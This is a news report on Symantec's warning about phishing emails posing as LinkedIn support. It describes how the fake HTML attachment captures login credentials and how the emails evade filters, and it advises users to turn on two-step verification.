Cyber criminals are now targeting LinkedIn users by scamming them into sharing their credentials by sending out mails claiming to be from the support team of the world’s largest professional networking firm, security software firm Symantec warned today.
Founded in 2003, LinkedIn has over 300 million members globally, of which more than 26 million users are in India (as of June 2014). Symantec said that over the last week it has observed an increase in phishing emails claiming to be from the US-based firm’s support team.
No immediate response was available from LinkedIn. “The body of the email claims that irregular activities have prompted a ‘compulsory security update’ for the recipients’ LinkedIn account,” Symantec said. The email goes on to say that in order to secure their account, the recipient needs to download the attached form (an HTML attachment) and follow the instructions, it added.
The attachment is a copy of the real LinkedIn.com website, it said. “However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” Symantec warned. The email uses a lowercase ‘i’ to spell LinkedIn, instead of capital ‘I’ as used by the firm. “The difference in characters is indiscernible to the eye and functions as a way to evade mail filters. Also, the HTML attachment method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished,” Symantec said.
The security firm said LinkedIn users should consider turning on two-step verification as this would prevent an attacker to access the account even if a user’s credentials are compromised.